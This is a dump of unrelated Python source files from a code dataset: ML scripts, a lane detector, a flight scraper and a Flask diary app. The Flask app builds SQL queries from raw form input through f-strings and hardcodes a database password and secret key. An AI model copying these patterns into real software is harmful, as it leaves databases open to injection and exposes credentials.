sumOfKeyVal / sumOfVote\r\n\r\n # append the average vote result (=prediction) to result array\r\n result.append(avgVoteVal)\r\n resultT.append([avgVoteVal])\r\n\r\n # find max-voted item\r\n else:\r\n largestVoteVal = -1 # number of votes of largest voted target value\r\n largestVoteTargetVal = -1 # largest voted target value\r\n\r\n # key: class targetVals[j], value: vote score of targetVals[j]\r\n for key in vote.keys():\r\n value = vote[key]\r\n \r\n if value > largestVoteVal:\r\n largestVoteVal = value\r\n largestVoteTargetVal = key\r\n\r\n # append the largest vote result (=prediction) to result array\r\n result.append(largestVoteTargetVal)\r\n resultT.append([largestVoteTargetVal])\r\n\r\n # add vote result value\r\n # https://rfriend.tistory.com/352\r\n dfTest = np.column_stack([dfTest, resultT])\r\n\r\n # display as chart\r\n title = '(kNN) test data prediction'\r\n\r\n # print data as 2d or 3d space\r\n if len(dfTest[0]) == 3: # 2 except for target col\r\n PD_.printDataAsSpace(2, pd.DataFrame(dfTest, columns=['pca0', 'pca1', 'target']), title)\r\n elif len(dfTest[0]) == 4: # 3 except for target col\r\n PD_.printDataAsSpace(3, pd.DataFrame(dfTest, columns=['pca0', 'pca1', 'pca2', 'target']), title)\r\n \r\n # return the result array\r\n return result\r\n","sub_path":"AI_BASE/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281894206","text":"from A2 import data_preprocess, model_tuning\n\n\nclass A2:\n best_model = None\n hist = None\n\n def train(self, data_train, data_val):\n \"\"\"\n :param data_train: Predictors and labels in 
training set.\n :param data_val: Predictors and labels in validation set.\n :param load_model: Set True to load pre-trained model, otherwise train the model from scratch.\n :return: The accuracy on training set.\n \"\"\"\n model = model_tuning.build_model()\n hist, model = model_tuning.train_model(model, data_train, data_val)\n acc_train = model_tuning.measure_acc_train(model, data_train[0], data_train[2])\n\n self.best_model = model\n self.hist = hist\n return acc_train\n\n def test(self, data_test):\n \"\"\"\n :param data_test: Predictors and labels in test set.\n :return: The accuracy on test set.\n \"\"\"\n acc_test = model_tuning.measure_acc_test(self.best_model, data_test[0], data_test[1])\n return acc_test\n\n\ndef data_preprocessing():\n \"\"\"\n :return: The training set, validation set and test set.\n \"\"\"\n predictors, labels = data_preprocess.load_data()\n data_train, data_val, data_test = data_preprocess.train_val_test_split(predictors, labels, 0.2, 0.2)\n X_train_aug = data_preprocess.load_train_aug()\n data_train[0] = data_train[0].append(X_train_aug, ignore_index=True)\n y_train_aug = data_train[1]\n data_train[1] = data_train[1].append(y_train_aug, ignore_index=True)\n data_train, data_val, data_test = data_preprocess.data_prepare(data_train[0], data_train[1], data_val[0],\n data_val[1], data_test[0], data_test[1])\n return data_train, data_val, data_test\n","sub_path":"A2/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"270898451","text":"#!/usr/bin/env python\n# =============================================================================\n## @file\n# simple PyROOT script to visualize the histograms from LoKi_Phi example\n# @author Vanya BELYAEV Ivan.Belyaev@nikhef.nl\n# @date 2008-06-07\n# =============================================================================\n\"\"\"\nSimple PyROOT script to visualize the histograms from LoKi_Phi example\n\nConfiguration file for LoKiExample package\n\nThis file is a part of LoKi project - \n\\\"C++ ToolKit for Smart and Friendly Physics Analysis\\\"\n\nThe package has been designed with the kind help from\nGalina PAKHLOVA and Sergey BARSUK. 
Many bright ideas, \ncontributions and advices from G.Raven, J.van Tilburg, \nA.Golutvin, P.Koppenburg have been used in the design.\n\nBy usage of this code one clearly states the disagreement \nwith the campain of Dr.O.Callot et al.: \n\\\"No Vanya's lines are allowed in LHCb/Gaudi software.\\\"\n\n\"\"\"\n# =============================================================================\n__author__ = \" Vanya BELYAEV Ivan.Belyaev@nikhef.nl \"\n__version__ = \" CVS Tag $Name: not supported by cvs2svn $, version $Revision: 1.1 $ \"\n# =============================================================================\n\n\nimport ROOT\n\nf = ROOT.TFile( 'PhiMC_Histos.root' )\nf.ls()\nf.cd('PhiMC')\nf.ls()\nh1 = f.Get('PhiMC/K+ K- mass')\nh2 = f.Get('PhiMC/K+ K- mass, chi2_vx<49')\nh3 = f.Get('PhiMC/K+ K- mass, MC-truth')\n\ncanvas = ROOT.TCanvas(\"canvas\",'LoKiExample: LoKi_PhiMC', 1000, 1000 )\n\nh1.SetLineColor(3)\nh1.SetLineWidth(3)\nh1.Draw()\nh2.SetLineColor(4)\nh2.SetLineWidth(3)\nh2.Draw('Same')\nh3.SetLineColor(2)\nh3.SetLineWidth(3)\nh3.Draw('Same')\n\ncanvas.Print ( 'LoKi_PhiMC.eps' )\ncanvas.Print ( 'LoKi_PhiMC.gif' )\n\n\n \n# =============================================================================\n# The end \n# =============================================================================\n","sub_path":"Analysis/Ex/LoKiExample/python/LoKiExample/PhiMC_Histos.py","file_name":"PhiMC_Histos.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"295481512","text":"import numpy as np\nimport datetime\nfrom Pricechecker import *\nfrom scrapeparser import Flight\ndef createPriceMaster(Cities,startDate,lengthOfStays):\n # Cities = list of all the cities we have to go through\n master = np.ndarray((len(Cities),len(Cities),sum(lengthOfStays),25), dtype= np.ndarray)\n # our 4d array which stores top 25 flights^^^\n\n startDate = datetime.datetime.strptime(startDate, '%m/%d/%Y')\n # get next d days\n\n dateConverter(startDate)\n\n Dates = []\n for d in range(0,sum(lengthOfStays)):\n Dates.append(startDate+datetime.timedelta(days=d))\n\n # create a loop to go through the combinations\n\n length = len(Cities)\n\n for i in range(0,length):\n for j in range(0,length):\n if(Cities[i]!=Cities[j]):\n m = np.ndarray((sum(lengthOfStays),25),dtype= Flight)\n print(Cities[i], Cities[j])\n for d in range(len(Dates)):\n #for each date create a matrix\n convertedDate = dateConverter(Dates[d])\n currentFlights = getFlights(Cities[i],Cities[j],convertedDate)\n currentFlights = currentFlights[:25]\n if(len(currentFlights) != 25):\n currentFlights.extend([None] * (25-len(currentFlights)))\n for x in range(0,25):\n m[d][x] = currentFlights[x]\n m[d][0].print()\n master[i][j] = m\n #Add a sort by price somewhere in the lower tier classes\n return master\n\ndef dateConverter(date):\n # input is a datetime object\n Months = [\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n Days = np.arange(1,31)\n convertedDate = Months[date.month+1] + \" \" + str(date.day) + \", \" +str(date.year)\n return convertedDate","sub_path":"Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252082505","text":"import numpy as np\nimport cv2\nimport numpy.polynomial.polynomial as npp\n\n\"\"\"\nVariable setup-\n1 - Canny thresholds\n2 - Mask polygon co-ords\n3 - 
Hough transformation vars\n\"\"\"\n# 1 - Lower/Upper Canny thresholds\n# Depreciated - Variables have to manually be set in the canny function otherwise the code breaks.\n\n#2 - Points 1-4 co-ordinates for mask\nx1 = 422\ny1 = 332\nx2 = 123\ny2 = 540\nx3 = 897\ny3 = 540\nx4 = 551\ny4 = 323\n\n#3 - Hough transformation variables\nrho = 2\ntheta = 1 * np.pi/180\nthreshold = 23\nminLength = 3\nmaxGap = 21\n\n\"\"\"\nVideo import/export setup\n\"\"\"\n# Importing the test video\ncap = cv2.VideoCapture(\"test_videos/solidYellowLeft.mp4\")\nif not cap.isOpened():\n raise BrokenPipeError(\"Video not initializing\")\n\n# Defining codecs and videoWriter for creating output video\nfourcc = cv2.VideoWriter_fourcc(*\"DIVX\")\noutput = cv2.VideoWriter(\"annotated_videos/solidYellowLeft_final.avi\", fourcc, 20.0, (int(cap.get(3)), int(cap.get(4))))\n\n\"\"\"\nVideo processing start\n\"\"\"\nwhile True:\n ret, frame = cap.read()\n\n if not ret: # If frame is not read, video has ended, exit\n break\n\n # Image converted to grayscale for processing\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Canny edge detection run on image\n canny = cv2.Canny(img, 174, 173)\n\n # Creating polygon mask\n mask = np.zeros_like(canny)\n imshape = img.shape\n vertices = np.array([[(x1, y1), (x2, y2), (x3, y3), (x4, y4)]], dtype=np.int32)\n cv2.fillPoly(mask, vertices, 255)\n\n # Applying mask and hough transform\n masked_edges = cv2.bitwise_and(canny, mask)\n linesP = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]), minLength, maxGap)\n\n # Drawing lane lines based upon average of hough lines\n left_points_x = []\n left_points_y = []\n right_points_x = []\n right_points_y = []\n if linesP is not None: # Determining whether a line is horizontal (discarded) or to the left or right of the image\n for i in range(0, len(linesP)):\n l = linesP[i][0]\n # l0 = x1, l1 = y1, l2 = x2, l3 = y2\n # cv2.line(frame, (l[0], l[1]), (l[2], l[3]), (0, 255, 100), 2, cv2.LINE_AA)\n if (l[3]-l[1]) / (l[2]-l[0]) > 0.25 or (l[3]-l[1]) / (l[2]-l[0]) < -0.25:\n if l[0] <= (int(cap.get(3)) //2 ):\n left_points_x.append(l[0])\n left_points_y.append(l[1])\n left_points_x.append(l[2])\n left_points_y.append(l[3])\n else:\n right_points_x.append(l[0])\n right_points_y.append(l[1])\n right_points_x.append(l[2])\n right_points_y.append(l[3])\n\n # Using linear regression to find linear equations representing left and right lines\n left_line = None\n right_line = None\n if left_points_x and left_points_y:\n left_line = npp.polyfit(left_points_y, left_points_x, 1)\n if right_points_x and right_points_y:\n right_line = npp.polyfit(right_points_y, right_points_x, 1)\n\n # Drawing the left and right lines using co-ords determined from line equations\n if left_line is not None:\n cv2.line(frame, (int(npp.polyval(y1, left_line)), y1),\n (int(npp.polyval(y2, left_line)), y2), (0, 255, 100), 4, cv2.LINE_AA)\n if right_line is not None:\n cv2.line(frame, (int(npp.polyval(y3, right_line)), y3),\n (int(npp.polyval(y4, right_line)), y4), (0, 255, 100), 4, cv2.LINE_AA)\n\n # Writing the modified frame to the output video\n output.write(frame)\n\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(19) == ord('q'):\n break\n\ncap.release()\noutput.release()\ncv2.destroyAllWindows()\n","sub_path":"A3_Line_Detection/videoAnnotator_final.py","file_name":"videoAnnotator_final.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617425300","text":"import os, 
requests\nimport pymysql\nfrom datetime import datetime\nfrom flask import Flask, render_template\nfrom flask import request, redirect, abort, session, jsonify\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport random\n\n\n\napp = Flask(__name__, \n static_folder=\"static\",\n template_folder=\"views\")\napp.config['ENV'] = 'development'\napp.config['DEBUG'] = True\napp.secret_key = 'abcabc'\n\ndb = pymysql.connect(\n user='root',\n passwd='8427728c',\n host='localhost',\n db='0424_project',\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor\n)\n\ndef get_menu(name):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select b.* from tb_members a, tb_diary b where a.id = b.member_id and a.name = '{name}'\"\"\")\n menu = [f\"
• {row['title']}
  • \"\n for row in cursor.fetchall()]\n return '\\n'.join(menu)\n\n \n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef index(): \n \n title = 'Welcome ' + session['user']['name'] if 'user' in session else 'Welcome'\n content = 'Welcome My Diary!'\n \n if 'user' in session:\n name = session['user']['name']\n menu = get_menu(session['user']['name'])\n else:\n name = ''\n menu = ''\n \n return render_template('template.html',\n name = name,\n title = title,\n content = content,\n menu = menu)\n\n@app.route(\"/login\", methods = [\"GET\", \"POST\"])\ndef login():\n message = \"\"\n if request.method == \"POST\":\n cursor = db.cursor()\n cursor.execute(f\"\"\"select * from tb_members where name = '{request.form[\"name\"]}'\"\"\")\n user = cursor.fetchone()\n \n if user is None:\n message = \"
You are not a member.
    \"\n else:\n cursor.execute(f\"\"\"\n select id, name, profile, password from tb_members \n where name = '{request.form['name']}' and \n password = SHA2('{request.form['password']}', 256)\"\"\")\n user = cursor.fetchone()\n if user is None:\n message = \"
Please check your password
    \"\n else:\n session['user'] = user\n return redirect(\"/\")\n \n return render_template('login.html',\n message=message)\n\n@app.route('/logout')\ndef logout():\n session.pop('user', None)\n return redirect('/')\n\n\n\n@app.route('/')\ndef diary(id):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select title, content from tb_diary\n where id = {id}\n \"\"\")\n diary_list = cursor.fetchone()\n title = diary_list['title']\n content = diary_list['content'] \n \n return render_template('diary.html',\n name = session['user']['name'],\n title=title,\n content=content,\n menu=get_menu(session['user']['name']),\n id = id,\n img_src = get_img(title))\n\n# 웹에서 이미지 검색 & 결과 보여주기\ndef get_img(word):\n url = \"https://search.naver.com/search.naver\"\n query = { 'where': 'image',\n 'sm' : 'tab_jum',\n 'query' : word\n }\n response = requests.get(url,params=query)\n soup = BeautifulSoup(response.content, \"html.parser\")\n tags = soup.select('img._img')\n \n \n \n return tags[random.randrange(50)]['data-source']\n\n\n@app.route('/create', methods=[\"get\", \"post\"])\ndef create():\n if request.method == \"POST\":\n cursor = db.cursor()\n cursor.execute(f\"\"\"insert tb_diary (title, content, created, member_id)\n values ('{request.form['title']}', '{request.form['content']}',\n '{datetime.now()}', '{session['user']['id']}')\n \"\"\")\n db.commit()\n\n return redirect('/')\n \n return render_template('create.html',\n name = session['user']['name'],\n menu = get_menu(session['user']['name']))\n\n@app.route(\"/delete/\")\ndef delete(id):\n cursor = db.cursor()\n cursor.execute(f\"delete from tb_diary where id='{id}'\")\n db.commit()\n \n return redirect(\"/\")\n \n@app.route(\"/update/\", methods = [\"GET\", \"POST\"])\ndef update(id):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select title, content from tb_diary\n where id = {id}\n \"\"\")\n diary_list = cursor.fetchone()\n title = diary_list['title']\n content = diary_list['content']\n \n if request.method == \"POST\":\n cursor.execute(f\"\"\"update tb_diary set\n title = '{request.form['title']}',\n content = '{request.form['content']}',\n created = '{datetime.now()}'\n where id = '{id}'\"\"\")\n return redirect(\"/\")\n \n return render_template('update.html',\n name = session['user']['name'],\n title=title,\n content=content,\n menu=get_menu(session['user']['name']),\n id = id)\n\n\n@app.route('/crawler/google/')\ndef crawler_google(word):\n# def download_img_from_tag(tag, filename):\n# response = requests.get(tag['data-source'])\n# with open(filename, 'wb') as f:\n# f.write(response.content)\n\n driver = webdriver.Chrome('chromedriver.exe')\n driver.implicitly_wait(10)\n \n url = \"https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EB%84%A4%EC%9D%B4%EB%B2%84%EC%9A%B4%EC%84%B8\"\n driver.get(url)\n driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n driver.find_element_by_css_selector('#srch_txt').send_keys(word)\n driver.find_element_by_xpath('//*[@id=\"fortune_birthCondition\"]/div[1]/fieldset/input').click()\n# soup = BeautifulSoup(driver.page_source, 'html.parser')\n# tags = soup.select(\"h3.r dO0Ag\")\n# filenames = []\n# for i, tag in enumerate(tags):\n# # tag를 던지면 이미지를 저장하고 이미지명을 반환\n# filename = f'static/{word}{i}.jpg'\n# download_img_from_tag(tag, filename)\n# filenames.append(filename)\n \n# return render_template('crawler.html',\n# files=filenames)\n\n#################################\n#네이버운세 selenium\n#####################3\n# from selenium import webdriver\n# import time\n# driver = 
webdriver.Chrome('chromedriver.exe')\n# driver.implicitly_wait(3)\n# url = \"https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EB%84%A4%EC%9D%B4%EB%B2%84%EC%9A%B4%EC%84%B8\"\n# driver.get(url)\n\n# driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n# driver.find_element_by_css_selector('#nx_query').click()\n# time.sleep(1)\n# driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n# driver.find_element_by_css_selector('#srch_txt').send_keys('19801111')\n\n\napp.run(port=8088)","sub_path":"0424_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"416010782","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nimport re \nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nfrom sklearn.cluster import MiniBatchKMeans\nimport nltk \nfrom nltk.corpus import stopwords\nimport os \nfrom sklearn.decomposition import PCA\n\nstops = set(stopwords.words(\"english\"))\ntokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n\ndef load_w2v_model(dir = './' , we_fn = 'glove.840B.300d.txt'):\n print(' >> Indexing word vectors ...')\n embeddings_index = {}\n f = open(os.path.join(dir, we_fn))\n for line in f:\n values = line.split(' ')\n word = values[0] #print(\"values:\",values)\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print(' >> Found %s word vectors. [1]' % len(embeddings_index))\n return embeddings_index\n\ndef count_desc_len(x):\n return len(review_to_sentences(x, tokenizer=tokenizer, stops=stops, remove_stopwords=True))\n\ndef string_to_wordlist( review, stops, remove_stopwords ):\n # Function to convert a document to a sequence of words,\n # optionally removing stop words. Returns a list of words.\n #\n # 1. Remove HTML\n #review_text = BeautifulSoup(review,'html.parser').get_text()\n #\n # 2. Remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review)\n #\n # 3. Convert words to lower case and split them\n words = review_text.lower().split()\n #\n # 4. Optionally remove stop words (false by default)\n if remove_stopwords:\n #stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n #\n # 5. Return a list of words\n return(words)\n\n\n# Define a function to split a review into parsed sentences\ndef review_to_sentences( review, tokenizer, stops , remove_stopwords ):\n # Function to split a review into parsed sentences. Returns a\n # list of sentences, where each sentence is a list of words\n #\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(review.strip())\n #\n # 2. 
Loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n # If a sentence is empty, skip it\n if len(raw_sentence) > 0:\n # Otherwise, call review_to_wordlist to get a list of words\n sentences.extend( string_to_wordlist( raw_sentence, stops = stops , remove_stopwords=remove_stopwords ))\n #\n # Return the list of sentences (each sentence is a list of words,\n # so this returns a list of lists\n return sentences\n\n\ndef process_am(x):\n aa = ''\n if type(x) == pd.core.series.Series:\n x = x.values\n aa = [aa + x[i] for i in range(len(x))]\n aa = aa[0]\n aa = re.sub('\"',\" \", aa)\n elif type(x) == str:\n aa = x\n aa = re.sub('\"',\" \", aa)\n aal = []\n _aal = aa.split(',')\n for aa in _aal:\n aa = re.sub(\"{\",\" \", aa)\n aa = re.sub(\"}\",\" \", aa)\n aa = re.sub(\",\",\" \", aa)\n aa = re.sub(\":\",\" \", aa)\n aa = re.sub('’n',\"\", aa)\n aa = aa.strip()\n aa = re.sub('\\s+',\"_\", aa)\n aa = aa.lower()\n if len(aa)>0: \n aal.append(aa)\n return dict.fromkeys(set(aal), 1)\n\ndef perc2float(x):\n return float(x.strip('%'))/100\n\n\n########################\ntrain = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\nprint(\"train:\",train.shape)\nprint(\"test:\",test.shape)\n\n# 1. log_price\nprint(\"1. log_price\")\ny_train = train['log_price']\ntrain = train.drop(['log_price'],axis=1)\nassert train.shape[1] == test.shape[1]\nfor i in range(train.shape[1]):\n assert train.columns[i] == test.columns[i]\n\ntrain_obs = len(train)\nall_data = pd.concat([train,test],axis=0)\n\n# 2. property_type, room_type, bed_type\nprint('--------------> Feature Engineering ... ')\nprint(\"2. property_type, room_type, bed_type\")\nencoder = LabelEncoder()\nencoder.fit(all_data['property_type']) \nall_data['property_type'] = encoder.transform(all_data['property_type'])\n\nall_data['room_type'] = all_data['room_type'].map( {'Entire home/apt':5, 'Private room':3, 'Shared room':1})\n\nall_data.bed_type = all_data.bed_type.fillna('missing')\nencoder = LabelEncoder()\nencoder.fit(all_data['bed_type']) \nall_data['bed_type'] = encoder.transform(all_data['bed_type'])\n\n# 3. amenities \nprint(\"3. amenities\")\nam_list = [process_am( all_data.iloc[i]['amenities']) for i in range(len(all_data))]\nassert len(am_list) == len(all_data)\nv = DictVectorizer(sparse=False)\nX = v.fit_transform(am_list)\namenities_df = pd.DataFrame(data=X,columns=v.feature_names_)\namenities_df.index = all_data.index\nall_data = pd.concat([all_data,amenities_df],axis=1)\nall_data = all_data.drop(['amenities'],axis=1)\ndel amenities_df\n\n#4. accommodates , bathrooms\nall_data.bathrooms = all_data.bathrooms.fillna(0)\n\n#5. cancellation_policy, cleaning_fee\nprint(\"5. cancellation_policy, cleaning_fee\")\nall_data['cancellation_policy'] = all_data['cancellation_policy'].map( {\n 'super_strict_60':20, \n 'super_strict_30':30, \n 'strict':50,\n 'moderate':10,\n 'flexible':5,\n 'long_term':1,\n})\n\nall_data['cleaning_fee'] = all_data['cleaning_fee'].map( {\n True:1, \n False:0\n})\n\n# 6. city\nprint(\"6. city\")\nencoder = LabelEncoder()\nencoder.fit(all_data['city']) \nall_data['city'] = encoder.transform(all_data['city'])\n\n# 7. description TODO\nprint(\"7. description ... 
TODO\")\nall_data['description'] = all_data['description'].fillna('')\n\nall_data['description_len'] = all_data['description'].apply(count_desc_len)\n\nembeddings_index = load_w2v_model()\n\nfeatureVec = np.zeros((len(all_data),300),dtype=\"float32\")\nwarn_w2v = 0 \nfor i in range(len(all_data)):\n words = review_to_sentences(all_data.iloc[i]['description'], tokenizer=tokenizer, stops=stops, remove_stopwords=True)\n featureVec_i = np.zeros((300),dtype=\"float32\")\n #\n nwords = 0.\n # \n #\n # Loop over each word in the review and, if it is in the model's\n # vocaublary, add its feature vector to the total\n for word in words:\n if word in embeddings_index.keys(): \n nwords = nwords + 1.\n featureVec_i = np.add(featureVec_i,embeddings_index[word])\n # \n # Divide the result by the number of words to get the average\n if nwords > 0: \n featureVec_i = np.divide(featureVec_i,nwords)\n else:\n #print(\">>> WARNING <<< No words in vocaublary\")\n warn_w2v = warn_w2v + 1 \n #print(str(words))\n featureVec[i] = featureVec_i\n\nprint(\" >> No words in vocaublary for \",warn_w2v,\"cases\")\n\n#desc_w2v = pd.DataFrame(data=featureVec , columns=['desc_w2v_'+str(i) for i in range(300)])\n#desc_w2v.index = all_data.index\n#all_data = pd.concat([all_data,desc_w2v],axis=1)\n\npca = PCA().fit(featureVec)\nw2v_desc_pca_transf = pca.transform(featureVec)\nall_data['w2v_desc_pca0'] = w2v_desc_pca_transf[:, 0]\nall_data['w2v_desc_pca1'] = w2v_desc_pca_transf[:, 1]\nall_data['w2v_desc_pca2'] = w2v_desc_pca_transf[:, 2]\nall_data['w2v_desc_pca3'] = w2v_desc_pca_transf[:, 3]\nall_data['w2v_desc_pca4'] = w2v_desc_pca_transf[:, 4]\nall_data['w2v_desc_pca5'] = w2v_desc_pca_transf[:, 5]\nall_data['w2v_desc_pca6'] = w2v_desc_pca_transf[:, 6]\nall_data['w2v_desc_pca7'] = w2v_desc_pca_transf[:, 7]\nall_data['w2v_desc_pca8'] = w2v_desc_pca_transf[:, 8]\nall_data['w2v_desc_pca9'] = w2v_desc_pca_transf[:, 9]\nall_data['w2v_desc_pca10'] = w2v_desc_pca_transf[:, 10]\nall_data['w2v_desc_pca11'] = w2v_desc_pca_transf[:, 11]\nall_data['w2v_desc_pca12'] = w2v_desc_pca_transf[:, 12]\nall_data['w2v_desc_pca13'] = w2v_desc_pca_transf[:, 13]\nall_data['w2v_desc_pca14'] = w2v_desc_pca_transf[:, 14]\nall_data['w2v_desc_pca15'] = w2v_desc_pca_transf[:, 15]\nall_data['w2v_desc_pca16'] = w2v_desc_pca_transf[:, 16]\nall_data['w2v_desc_pca17'] = w2v_desc_pca_transf[:, 17]\nall_data['w2v_desc_pca18'] = w2v_desc_pca_transf[:, 18]\nall_data['w2v_desc_pca19'] = w2v_desc_pca_transf[:, 19]\nall_data['w2v_desc_pca20'] = w2v_desc_pca_transf[:, 20]\nall_data['w2v_desc_pca21'] = w2v_desc_pca_transf[:, 21]\nall_data['w2v_desc_pca22'] = w2v_desc_pca_transf[:, 22]\nall_data['w2v_desc_pca23'] = w2v_desc_pca_transf[:, 23]\nall_data['w2v_desc_pca24'] = w2v_desc_pca_transf[:, 24]\nall_data['w2v_desc_pca25'] = w2v_desc_pca_transf[:, 25]\nall_data['w2v_desc_pca26'] = w2v_desc_pca_transf[:, 26]\nall_data['w2v_desc_pca27'] = w2v_desc_pca_transf[:, 27]\nall_data['w2v_desc_pca28'] = w2v_desc_pca_transf[:, 28]\nall_data['w2v_desc_pca29'] = w2v_desc_pca_transf[:, 29]\n\nkmeans = MiniBatchKMeans(n_clusters=100, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster \nall_data.loc[:, 'w2v_desc_cluster_100'] = kmeans.predict(featureVec)\n\nkmeans = MiniBatchKMeans(n_clusters=1000, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster \nall_data.loc[:, 'w2v_desc_cluster_1000'] = kmeans.predict(featureVec)\n\nkmeans = MiniBatchKMeans(n_clusters=3000, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster 
\n\nall_data = all_data.drop(['description'],axis=1)\n\n\n# 8. first_review , last_review , number_of_reviews , review_scores_rating\nprint(\"8. first_review , last_review , number_of_reviews , review_scores_rating ... TODO better\")\nmost_recent_review = pd.to_datetime(all_data.last_review).max()\ndelta_last_review = most_recent_review - pd.to_datetime(all_data.last_review)\n# convert the timedelta to float days first, then flag missing values with -1\ndelta_last_review = delta_last_review.dt.total_seconds()/(60*60*24)\ndelta_last_review = delta_last_review.fillna(-1)\nall_data['delta_most_recent_review'] = delta_last_review\n\ndelta_rev = pd.to_datetime(all_data.last_review) - pd.to_datetime(all_data.first_review)\ndelta_rev = delta_rev.dt.total_seconds()/(60*60*24)\ndelta_rev = delta_rev.fillna(-1)\nall_data['delta_rev'] = delta_rev\n\n# reviews per day; the parentheses matter here, the epsilon belongs to the numerator\ndelta_rev_density = (all_data.number_of_reviews + 0.0000000000000001) / delta_rev\ndelta_rev_density = delta_rev_density.fillna(0)\nall_data['delta_rev_density'] = delta_rev_density\n\nall_data = all_data.drop(['first_review','last_review'],axis=1)\nall_data['review_scores_rating'] = all_data['review_scores_rating'].fillna(-1)\n\n# 9. host_has_profile_pic, host_identity_verified, host_since\nprint(\"9. host_has_profile_pic, host_identity_verified, host_since \")\nall_data['host_has_profile_pic'] = all_data['host_has_profile_pic'].fillna('f')\nall_data['host_identity_verified'] = all_data['host_identity_verified'].fillna('f')\nall_data['host_has_profile_pic'] = all_data['host_has_profile_pic'].map({'t':1,'f':0})\nall_data['host_identity_verified'] = all_data['host_identity_verified'].map({'t':1,'f':0})\n\nhost_oldest = pd.to_datetime(all_data.host_since).min()\ndelta_host = pd.to_datetime(all_data.host_since) - host_oldest \ndelta_host = delta_host.dt.total_seconds()/(60*60*24)\ndelta_host = delta_host.fillna(-1)\nall_data['delta_host'] = delta_host\n\nall_data = all_data.drop(['host_since'],axis=1)\n\n# 10. host_response_rate , instant_bookable\nprint(\"10. host_response_rate , instant_bookable \")\nall_data['instant_bookable'] = all_data['instant_bookable'].map({'t':1,'f':0})\nall_data.host_response_rate = all_data.host_response_rate.fillna('0%')\nall_data.host_response_rate = all_data.host_response_rate.apply(perc2float)\n\n\n# 11. latitude,longitude TODO ... leave as-is for now \nprint(\"11. latitude,longitude .......... TODO \")
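\n# Aside on the date features above: ordering matters -- convert the timedelta to float\n# days first, then fillna. Self-contained illustration (demo_s is a hypothetical name,\n# unrelated to this dataset):\ndemo_s = pd.to_datetime(pd.Series(['2017-01-10', None])) - pd.Timestamp('2017-01-01')\nprint((demo_s.dt.total_seconds() / (60 * 60 * 24)).fillna(-1).tolist())  # [9.0, -1.0]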
TODO \")\n# pca = PCA().fit(all_data[['latitude','longitude']])\n# lalo_pca_transf = pca.transform(all_data[['latitude','longitude']])\n# all_data['latitude'] = lalo_pca_transf[:, 0]\n# all_data['longitude'] = lalo_pca_transf[:, 1]\n\n\nkmeans = MiniBatchKMeans(n_clusters=1000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_1000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=3000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_3000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=5000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_5000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=7000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_7000'] = kmeans.predict(all_data[['latitude','longitude']])\n\n# 12. name, neighbourhood, thumbnail_url, zipcode \nprint(\"11. name, neighbourhood, thumbnail_url, zipcode .......... TODO better \")\nall_data['thumbnail_url_ok'] = 0 \nall_data['thumbnail_url_ok'] [all_data.thumbnail_url.isnull() == False ] = 1\n\nall_data['neighbourhood'] = all_data['neighbourhood'].fillna('UKN')\nencoder = LabelEncoder()\nencoder.fit(all_data['neighbourhood']) \nall_data['neighbourhood'] = encoder.transform(all_data['neighbourhood'])\n\nall_data['zipcode'] = 